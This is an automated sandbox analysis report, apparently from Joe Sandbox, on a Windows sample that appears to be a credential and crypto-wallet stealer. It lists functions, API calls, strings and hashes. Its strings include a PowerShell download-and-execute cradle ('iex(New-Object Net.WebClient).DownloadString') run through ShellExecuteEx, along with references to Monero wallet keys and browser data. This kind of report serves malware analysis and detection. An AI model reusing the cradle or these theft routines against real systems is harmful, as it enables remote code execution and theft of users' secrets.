                                • Opcode Fuzzy Hash: 8121a75f167bbbfa459e6f73f1a01fbd4890bcef21146bd2555fa34905f7a981
                                • Instruction Fuzzy Hash: 5E312D74A0020AEFDB14CFA4C899FAEB7B5FF48300F108158E901A7290D779AA41CFA0
                                Function 00DD4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,0162E338), ref: 00DD47DB
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4801
                                • lstrcat.KERNEL32(?,?), ref: 00DD4820
                                • lstrcat.KERNEL32(?,?), ref: 00DD4834
                                • lstrcat.KERNEL32(?,0161B838), ref: 00DD4847
                                • lstrcat.KERNEL32(?,?), ref: 00DD485B
                                • lstrcat.KERNEL32(?,0162DB40), ref: 00DD486F
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DD8D90: GetFileAttributesA.KERNEL32(00000000,?,00DC1B54,?,?,00DE564C,?,?,00DE0E1F), ref: 00DD8D9F
                                  • Part of subcall function 00DD4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DD4580
                                  • Part of subcall function 00DD4570: RtlAllocateHeap.NTDLL(00000000), ref: 00DD4587
                                  • Part of subcall function 00DD4570: wsprintfA.USER32 ref: 00DD45A6
                                  • Part of subcall function 00DD4570: FindFirstFileA.KERNEL32(?,?), ref: 00DD45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: df7db501a934cfc70cb0691d82a4cb47618ede852ad2636fdee9b8fd39f393e9
                                • Instruction ID: 93e20a77b76f2cc515c9732941d615f6e87cac0541c7c8a82da78a57f6e852a0
                                • Opcode Fuzzy Hash: df7db501a934cfc70cb0691d82a4cb47618ede852ad2636fdee9b8fd39f393e9
                                • Instruction Fuzzy Hash: EC3162B6900318A7CB21F7A0DC85EED737CAB58700F404589B39597181EE75D7898FB5
                                Function 00DD2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD2D85
                                Strings
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00DD2D04
                                • ')", xrefs: 00DD2CB3
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00DD2CC4
                                • <, xrefs: 00DD2D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 321c1bffd88fa873722e47c5b5846dbbf9627179dde1fab58490a0fc8cffb179
                                • Instruction ID: 486ec9d42e33ee01146ccf7213c9dcd36cfc61968174b62ada6198f8a196ddfa
                                • Opcode Fuzzy Hash: 321c1bffd88fa873722e47c5b5846dbbf9627179dde1fab58490a0fc8cffb179
                                • Instruction Fuzzy Hash: 4E41FF71C402589ADB15FFA4C892BEDBB78EF10300F40811AF406A7291EF746A4ADFB5
                                Function 00DC9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00DC9F41
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 5fbd268bc35fc31e32aa78038533b226a71114ca0ad41c43375ed80106f023b0
                                • Instruction ID: 88e9baf9a589216688f33d2d4413bf42c3b8098e1191da167f0375d92dee0b58
                                • Opcode Fuzzy Hash: 5fbd268bc35fc31e32aa78038533b226a71114ca0ad41c43375ed80106f023b0
                                • Instruction Fuzzy Hash: F2611E71A10259AFDB24EFA8CC96FED7775EF45344F008018F90A5B285DB74AA06CB72
                                Function 00DD40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0162DCC0,00000000,00020119,?), ref: 00DD40F4
                                • RegQueryValueExA.ADVAPI32(?,0162E398,00000000,00000000,00000000,000000FF), ref: 00DD4118
                                • RegCloseKey.ADVAPI32(?), ref: 00DD4122
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4147
                                • lstrcat.KERNEL32(?,0162E458), ref: 00DD415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: ea5847b879461ddbbbab0580cf1914816104f6779f095377644132e8fa7e9f11
                                • Instruction ID: f07c42c3cfb34be11742d081a4188cca8153af88731bfd6d28df22b0d86f2970
                                • Opcode Fuzzy Hash: ea5847b879461ddbbbab0580cf1914816104f6779f095377644132e8fa7e9f11
                                • Instruction Fuzzy Hash: B341BBB6D10208ABDB25EBA0DC46FFE733DE788300F00455DB65557185EA769B888BB1
                                Function 00DD6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00DD696C
                                • sscanf.NTDLL ref: 00DD6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DD69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DD69C0
                                • ExitProcess.KERNEL32 ref: 00DD69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 77d8d5416ba1b03039e18664af8234d3755fcb29bd75558e010534cbe31e1c02
                                • Instruction ID: ddfaaedb228e3b60f3eb20f09b05c1e55c47c68a3d15fb8a7bdb7981c2d50ccb
                                • Opcode Fuzzy Hash: 77d8d5416ba1b03039e18664af8234d3755fcb29bd75558e010534cbe31e1c02
                                • Instruction Fuzzy Hash: 1D21CB75D14208ABCF15EFE8D945AEEB7B9FF48300F04852AE506E3244EB359605CBA9
                                Function 00DD7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0161BEF8,00000000,00020119,?), ref: 00DD7E5E
                                • RegQueryValueExA.ADVAPI32(?,0162DAA0,00000000,00000000,000000FF,000000FF), ref: 00DD7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00DD7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: ffb34ba19e17accbde09e164656cbaa1b10cb8b24e4d71d11c932c4c9b6f9e21
                                • Instruction ID: ce48b1fef322ab53c3c4327c984cb3f97bdefe1dc3c1c3021ec16c6b5b1029cb
                                • Opcode Fuzzy Hash: ffb34ba19e17accbde09e164656cbaa1b10cb8b24e4d71d11c932c4c9b6f9e21
                                • Instruction Fuzzy Hash: E7118CB1A44309EBD710CB94D849FBBBBB8FB48B10F10415AF655A7284D77959008BB0
                                Function 00DD9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(0162DF78,?,?,?,00DD140C,?,0162DF78,00000000), ref: 00DD926C
                                • lstrcpyn.KERNEL32(0100AB88,0162DF78,0162DF78,?,00DD140C,?,0162DF78), ref: 00DD9290
                                • lstrlen.KERNEL32(?,?,00DD140C,?,0162DF78), ref: 00DD92A7
                                • wsprintfA.USER32 ref: 00DD92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 3aae57fbe10cc9500df1d8f4e277a200da2ebc31c101296b2a97ad3b9fdebca8
                                • Instruction ID: d765e06f168122d785b243e5752e71b4c0ab4fa9ff5cee0722ec4f94baa57c60
                                • Opcode Fuzzy Hash: 3aae57fbe10cc9500df1d8f4e277a200da2ebc31c101296b2a97ad3b9fdebca8
                                • Instruction Fuzzy Hash: 9E010C75600208FFCB05DFECC994EAE7BB9FB48350F508548F9498B245CA75AA40DBA0
                                Function 00DC12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DC12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DC12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DC12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00DC12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 778f2732287a6427c6e6ad245d6d9c2f981cd6c6e06f9564550a4f1c529d8535
                                • Instruction ID: bdaf3f7a3fa1ef3fbbae3a31e747ef132d7e233e62a4eccf5096e31885beef23
                                • Opcode Fuzzy Hash: 778f2732287a6427c6e6ad245d6d9c2f981cd6c6e06f9564550a4f1c529d8535
                                • Instruction Fuzzy Hash: 4F011DB9A40308FBDB10DFE0DC49FAEB7B8EB48701F008159FA4597284D6759A018B60
                                Function 00DDC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 3fc13e0bc9a6f6837dd27611b8f3d09f787208c37b9f41f9e7af8794a60dafc3
                                • Instruction ID: f35ce223a84c9c17c3de6304a925c9906a218e2154c2690dd4885a95ef92dd45
                                • Opcode Fuzzy Hash: 3fc13e0bc9a6f6837dd27611b8f3d09f787208c37b9f41f9e7af8794a60dafc3
                                • Instruction Fuzzy Hash: 7B4136B111079D5EDB218B24CD94FFBBBE89F05305F1854EAE9CA86282E2719A44DF30
                                Function 00DD6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00DD6663
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD6726
                                • ExitProcess.KERNEL32 ref: 00DD6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
